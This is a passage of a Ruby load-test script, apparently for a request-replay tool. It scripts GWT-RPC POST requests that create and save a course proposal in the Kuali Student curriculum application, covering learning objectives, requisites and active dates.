redit.degree.fixed|10|crossListings|descr|plain|#{opts[:course_description]}|expenditure|affiliatedOrgs|fees|formats|activities|activityType|defaultEnrollmentEstimate|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|duration|atpDurationTypeKey|timeQuantity|kuali.atp.duration.Week|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|gradingOptions|kuali.resultComponent.grade.letter|id|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|metaInfo|createId|#{opts[:propose_person]}|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|#{version_indicator+=1}|pilotCourse|revenues|specialTopicsCourse|state|draft|subjectArea|#{opts[:subject_area]}|termsOffered|kuali.atp.season.Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|unitsContentOwner|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|%%_#{opts[:admin_dep_var_name]}%%|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|versionIndId|%%_#{opts[:version_ind_id_name]}%%|finalExamStatus|audit|passFail|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|3|name|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators|kuali.atp.duration.Semester|STD\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|36|8|9|10|5|6|7|0|2|11|12|0|13|14|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|17|-12|-14|-5|-10|-1|-3|8|18|13|19|8|20|13|21|8|22|10|5|6|7|0|0|-1|-24|8|23|13|24|8|25|10|5|6|7|0|1|11|-8|10|5|6|7|0|3|8|15|10|5|6|7|0|3|8|26|10|5|6|7|0|2|8|27|28|29|1|8|30|28|-48|-40|-42|8|31|28|-48|-38|10|5|6|7|0|1|-42|10|5|6|7|0|1|-51|28|-48|-54|-42|-40|-38|-36|-38|-46|13|32|-49|13|33|-32|-34|-1|-30|8|34|10|5|6|7|0|0|-1|-62|8|35|10|5|6|7|0|1|8|36|13|37|-1|-66|8|38|10|5|6|7|0|1|8|39|10|5|6|7|0|0|-74|-76|-1|-72|8|40|10|5|6|7|0|0|-1|-80|8|41|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|42|10|5|6|7|0|1|11|-8|10|5|6|7|0|5|-38|10|5|6|7|0|3|-42|10|5|6|7|0|2|8|43|28|-48|8|44|28|-48|-101|-42|8|31|28|-48|-38|10|5|6|7|0|1|-42|10|5|6|7|0|1|-110|28|-48|-113|-42|-101|-38|-98|-38|-106|13|45|8|46|10|5|6|7|0|3|8|47|13|48|-38|10|5|6|7|0|1|-42|10|5|6|7|0|2|-124|28|-48|8|49|28|-48|-127|-42|-122|-38|-133|13|50|-98|-120|8|51|10|5|6|7|0|3|-38|10|5|6|7|0|1|-42|10|5|6|7|0|2|8|52|28|-48|8|53|28|-48|-141|-42|-138|-38|-146|13|54|-148|55|12|13|-98|-136|-108|55|12|100|-94|-96|-90|-92|8|15|10|5|6|7|0|2|8|31|28|-48|-38|10|5|6|7|0|1|-42|10|5|6|7|0|1|-159|28|-48|-162|-42|-157|-38|-90|-155|-86|-88|-1|-84|8|56|10|5|6|7|0|1|11|-8|13|57|-1|8|56|8|58|13|59|8|60|10|5|6|7|0|1|11|-8|10|5|6|7|0|2|8|61|13|62|8|15|10|5|6|7|0|1|8|61|10|5|6|7|0|1|8|16|13|63|-189|-191|-183|-187|-179|-181|-1|-177|8|64|10|5|6|7|0|0|-1|-197|8|65|13|66|8|67|10|5|6|7|0|5|8|68|13|69|8|70|71|72|3469526397|1309965025280|677000000|8|73|13|69|8|74|71|72|3469529329|1309965025280|609000000|8|75|13|76|-1|-203|8|77|28|29|0|8|78|10|5|6|7|0|0|-1|-222|8|79|28|-221|8|80|13|81|8|82|13|83|8|84|10|5|6|7|0|1|11|-8|13|85|-1|8|84|8|86|13|87|8|27|13|88|8|89|10|5|6|7|0|2|11|-8|13|90|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|91|-251|-253|-245|-249|-1|-243|8|92|10|5|6|7|0|2|11|-8|13|93|8|15|10|5|6|7|0|1|11|-8|10|5|6|7|0|1|8|16|13|94|-267|-269|-261|-265|-1|-259|8|95|10|5|6|7|0|0|-1|-275|8|96|10|5|6|7|0|3|8|97|71|72|3469526397|1309965025280|677000000|8|98|99|100|1|0|8|101|13|102|-1|-279|8|15|10|5|6|7|0|2|8|82|10|5|6|7|0|1|8|16|13|83|-293|-295|-42|10|5|6|7|0|5|8|84|28|-48|8|56|28|-48|8|103|28|-48|8|104|28|-48|8|105|28|-48|-293|-42|-1|-291|8|106|10|5|6|7|0|12|8|107|13|108|8|58|13|109|8|67|10|5|6|7|0|5|8|68|13|69|8|70|71|72|3469526678|1309965025280|958000000|8|73|13|69|8|74|71|72|3469530172|1309965025280|452000000|8|75|13|110|-316|-322|8|111|13|24|8|112|10|5|6|7|0|1|11|-8|13|59|-316|-340|8|113|13|114|8|115|10|5|6|7|0|0|-316|-348|8|116|10|5|6|7|0|0|-316|-352|8|117|13|118|8|80|13|119|8|27|13|120|8|121|13|122|-1|-314|8|123|10|5|6|7|0|1|8|124|10|5|6|7|0|0|-366|-368|-1|-364|8|51|10|5|6|7|0|3|-38|10|5|6|7|0|1|-42|10|5|6|7|0|2|8|52|28|-48|8|53|28|-48|-377|-42|-374|-38|-382|13|125|-384|55|12|2|-1|-372|-308|13|126|-310|28|-221|-312|28|-221|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:enroll_est_var_name], \"regexp\" => opts[:enroll_est_var_regexp]},\n {\"name\" => opts[:lab_var_name], \"regexp\" => opts[:lab_var_regexp]},\n {\"name\" => opts[:atp_duration_week_var_name], \"regexp\" => opts[:atp_duration_week_var_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/enroll_est_var_name/%%_#{opts[:enroll_est_var_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/lab_var_name/%%_#{opts[:lab_var_name]}%%\", {}, {'subst' => 'true'})\n #@request.add(\"DEBUG/atp_duration_week_var_name/%%_#{opts[:atp_duration_week_var_name]}%%\", {}, {'subst' => 'true'})\n\n @request.add_thinktime(2)\n \n \n \n #\n # Learning Objectives\n #\n\n @request.add_thinktime(5)\n\n # Category\n for i in 1..opts[:lo_category].length\n if(i == opts[:lo_category].length)\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lo.queryParam.loOptionalCategoryName|#{opts[:lo_category][0..itr]}|lo.search.loCategories|1|2|3|4|1|5|5|0|6|0|7|1|8|9|0|10|11|0|0|0|\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:lo_category_id_var_name], \"regexp\" => opts[:lo_category_id_var_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/lo_category_id_var_name/%%_#{opts[:lo_category_id_var_name]}%%\", {}, {'subst' => 'true'})\n\n else\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|lo.queryParam.loOptionalCategoryName|#{opts[:lo_category][0..itr]}|lo.search.loCategories|1|2|3|4|1|5|5|0|6|0|7|1|8|9|0|10|11|0|0|0|\"\n } \n )\n end \n end\n\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/LoCategoryRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|EDE1DECBD54F5894284944CD8AC3661C|org.kuali.student.lum.common.client.lo.rpc.LoCategoryRpcService|getData|java.lang.String/2004016611|%%_#{opts[:lo_category_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {'subst' => 'true'}\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/LoCategoryRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|EDE1DECBD54F5894284944CD8AC3661C|org.kuali.student.lum.common.client.lo.rpc.LoCategoryRpcService|getLoCategoryType|java.lang.String/2004016611|loCategoryType.subject|1|2|3|4|1|5|6|\"\n }\n )\n\n @request.add_thinktime(25)\n\n # Save & Continue\n contents1 = \"5|0|154|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loInfo|id|desc|formatted|#{opts[:lo_cat_text]}|plain|name|SINGLE USE LO|sequence|0|metaInfo|loCategoryInfoList|%%_#{opts[:lo_category_id_var_name]}%%|#{opts[:lo_category]}|loRepository|kuali.loRepository.key.singleUse|effectiveDate|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|expirationDate|state|active|type|loCategoryType.subject|createId|admin|createTime|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|#{opts[:propose_person]}|resultValues|draft|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|expenditure|affiliatedOrgs|fees|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|2|pilotCourse|revenues|specialTopicsCourse|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|%%_#{opts[:admin_dep_var_name]}%%|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Standard final Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|4|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|36|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|29|17|5|6|7|0|5|8|30|14|0|8|31|17|5|6|7|0|2|8|32|14|33|8|34|14|33|-41|-45|8|35|14|36|8|37|14|38|8|39|17|0|-37|-39|8|40|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|30|14|41|8|35|14|42|8|31|17|5|6|7|0|2|8|32|14|0|8|34|14|0|-65|-71|8|43|14|44|8|45|46|0|8|47|46|0|8|48|14|49|8|50|14|51|8|39|17|5|6|7|0|5|8|52|14|53|8|54|46|55|3759152200|1288490188800|0|8|56|14|53|8|57|46|55|3759152200|1288490188800|0|8|58|14|38|-65|-89|-61|-63|-37|-59|-33|-35|-1|8|28|8|59|14|60|8|61|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|62|14|63|8|30|14|64|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479039543|1309965025280|823000000|8|56|14|65|8|57|46|55|3479039543|1309965025280|823000000|8|58|14|38|-114|-120|8|66|17|5|6|7|0|1|18|-15|14|63|-114|-136|8|48|14|67|8|50|14|68|8|21|17|5|6|7|0|1|8|50|17|5|6|7|0|1|8|22|14|69|-148|-150|-114|-146|-110|-112|-1|-108|8|70|17|5|6|7|0|0|-1|-156|8|71|17|5|6|7|0|1|8|34|14|72|-1|-160|8|73|17|5|6|7|0|3|8|74|14|75|8|76|77|19|2|8|21|17|5|6|7|0|1|8|74|17|5|6|7|0|1|8|22|14|78|-177|-179|-168|-175|-1|-166|8|79|17|5|6|7|0|1|8|80|17|5|6|7|0|0|-187|-189|-1|-185|8|81|17|5|6|7|0|0|-1|-193|8|82|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|83|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|84|14|85|8|86|17|5|6|7|0|3|8|87|14|88|8|89|14|90|8|21|17|5|6|7|0|1|8|89|17|5|6|7|0|1|8|22|14|91|-225|-227|-217|-223|-211|-215|8|92|77|19|100|8|73|17|5|6|7|0|3|8|74|14|93|8|76|77|19|13|8|21|17|5|6|7|0|1|8|74|17|5|6|7|0|1|8|22|14|94|-247|-249|-238|-245|-211|-236|8|30|14|95|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479549402|1309965025280|682000000|8|56|14|65|8|57|46|55|3479549402|1309965025280|682000000|8|58|14|38|-211|-257|8|48|14|67|8|96|17|5|6|7|0|0|-211|-275|8|21|17|5|6|7|0|1|8|84|17|5|6|7|0|1|8|22|14|97|-281|-283|-211|-279|-207|-209|-203|-205|8|30|14|98|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479549392|1309965025280|672000000|8|56|14|65|8|57|46|55|3479549392|1309965025280|672000000|8|58|14|38|-203|-291|8|48|14|67|8|99|17|5|6|7|0|0|-203|-309|8|50|14|100|-199|-201|-1|-197|8|101|17|5|6|7|0|2|18|-15|14|102|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|103|-323|-325|-317|-321|-1|-315|8|30|14|104|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|106|14|107|8|21|17|5|6|7|0|1|8|106|17|5|6|7|0|1|8|22|14|108|-345|-347|-339|-343|-335|-337|-1|-333|8|109|17|5|6|7|0|0|-1|-353|8|110|14|111|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479545033|1309965025280|313000000|8|56|14|65|8|57|46|55|3479549354|1309965025280|634000000|8|58|14|112|-1|-359|8|113|10|-5|8|114|17|5|6|7|0|0|-1|-377|8|115|10|-5|8|48|14|67|8|116|14|117|8|99|17|5|6|7|0|2|18|-15|14|118|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|119|-395|-397|-389|-393|-1|-387|8|120|14|121|8|50|14|122|8|96|17|5|6|7|0|2|18|-15|14|123|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|124|-415|-417|-409|-413|-1|-407|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-431|-433|-425|-429|-1|-423|8|128|17|5|6|7|0|0|-1|-439|8|129|17|5|6|7|0|3|8|130|46|55|3479545033|1309965025280|313000000|8|131|132|133|1|0|8|134|14|135|-1|-443|8|21|17|5|6|7|0|2|8|116|17|5|6|7|0|1|8|22|14|117|-457|-459|8|13|17|5|6|7|0|1|8|22|14|136|-457|-465|-1|-455|8|137|17|5|6|7|0|12|8|138|14|139|8|30|14|140|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479545302|1309965025280|582000000|8|56|14|65|8|57|46|55|3479550248|1309965025280|528000000|8|58|14|141|-473|-479|8|35|14|60|8|142|17|5|6|7|0|1|18|-15|14|104|-473|-497|8|143|14|144|8|145|17|5|6|7|0|0|-473|-505|8|146|17|5|6|7|0|0|-473|-509|8|147|14|148|8|48|14|149|8|50|14|150|8|151|14|152|-1|-471|8|153|17|5|6|7|0|1|8|154|17|5|6|7|0|0|-523|-525|-1|-521|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:lo_category_var_name], \"regexp\" => opts[:lo_category_var_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/lo_category_var_name/%%_#{opts[:lo_category_var_name]}%%\", {}, {'subst' => 'true'})\n\n @request.add_thinktime(2)\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/LoCategoryRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|4|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|EDE1DECBD54F5894284944CD8AC3661C|org.kuali.student.lum.common.client.lo.rpc.LoCategoryRpcService|getLoCategoryTypes|1|2|3|4|0|\"\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/statementRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|2543249A07E7952228E0E500F14F1B17|org.kuali.student.lum.program.client.rpc.StatementRpcService|getStatementTypesForStatementTypeForCourse|java.lang.String/2004016611|kuali.statement.type.course|1|2|3|4|1|5|6|\"\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CourseRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|getCourseStatements|java.lang.String/2004016611|%%_#{opts[:clu_ref_dyn_var_name]}%%|KUALI.RULE|en|1|2|3|4|3|5|5|5|6|7|8|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n \n \n #\n # Course Requisites\n # Save without editing anything\n\n @request.add_thinktime(5)\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CourseRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|storeCourseStatements|java.lang.String/2004016611|java.util.Map|%%_#{opts[:clu_ref_dyn_var_name]}%%|draft|java.util.HashMap/962170901|java.util.LinkedHashMap/1551059846|1|2|3|4|4|5|5|6|6|7|8|9|0|10|0|0|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/statementRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|2543249A07E7952228E0E500F14F1B17|org.kuali.student.lum.program.client.rpc.StatementRpcService|getStatementTypesForStatementTypeForCourse|java.lang.String/2004016611|kuali.statement.type.course|1|2|3|4|1|5|6|\"\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CourseRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|getCourseStatements|java.lang.String/2004016611|%%_#{opts[:clu_ref_dyn_var_name]}%%|KUALI.RULE|en|1|2|3|4|3|5|5|5|6|7|8|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n \n \n #\n # Active Dates\n # Start = Fall Sem 2008\n #\n\n @request.add_thinktime(10)\n\n # Save & Continue\n contents1 = \"5|0|160|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|expenditure|affiliatedOrgs|fees|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|1|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|3|pilotCourse|revenues|specialTopicsCourse|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|%%_#{opts[:admin_dep_var_name]}%%|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Standard final Exam|dirty|startTerm|endTerm|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators|kuali.atp.FA2008-2009\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487349987|1309965025280|267000000|8|40|14|59|8|41|38|39|3487349987|1309965025280|267000000|8|42|14|43|-79|-95|8|44|14|60|8|46|14|61|8|48|14|62|-37|-77|-33|-35|-1|-31|8|63|14|64|8|65|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|66|14|67|8|30|14|68|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|69|17|5|6|7|0|1|18|-15|14|67|-125|-147|8|46|14|61|8|48|14|70|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|71|-159|-161|-125|-157|-121|-123|-1|-119|8|72|17|5|6|7|0|0|-1|-167|8|73|17|5|6|7|0|1|8|56|14|74|-1|-171|8|75|17|5|6|7|0|3|8|76|14|77|8|78|79|19|2|8|21|17|5|6|7|0|1|8|76|17|5|6|7|0|1|8|22|14|80|-188|-190|-179|-186|-1|-177|8|81|17|5|6|7|0|1|8|82|17|5|6|7|0|0|-198|-200|-1|-196|8|83|17|5|6|7|0|0|-1|-204|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|85|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|86|14|87|8|88|17|5|6|7|0|3|8|89|14|90|8|91|14|92|8|21|17|5|6|7|0|1|8|91|17|5|6|7|0|1|8|22|14|93|-236|-238|-228|-234|-222|-226|8|94|79|19|100|8|75|17|5|6|7|0|3|8|76|14|95|8|78|79|19|13|8|21|17|5|6|7|0|1|8|76|17|5|6|7|0|1|8|22|14|96|-258|-260|-249|-256|-222|-247|8|30|14|97|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487345884|1309965025280|164000000|8|40|14|59|8|41|38|39|3487349962|1309965025280|242000000|8|42|14|98|-222|-268|8|46|14|61|8|99|17|5|6|7|0|0|-222|-286|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|100|-292|-294|-222|-290|-218|-220|-214|-216|8|30|14|101|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487345875|1309965025280|155000000|8|40|14|59|8|41|38|39|3487349936|1309965025280|216000000|8|42|14|98|-214|-302|8|46|14|61|8|102|17|5|6|7|0|0|-214|-320|8|48|14|103|-210|-212|-1|-208|8|104|17|5|6|7|0|2|18|-15|14|105|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|106|-334|-336|-328|-332|-1|-326|8|30|14|107|8|108|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|109|14|110|8|21|17|5|6|7|0|1|8|109|17|5|6|7|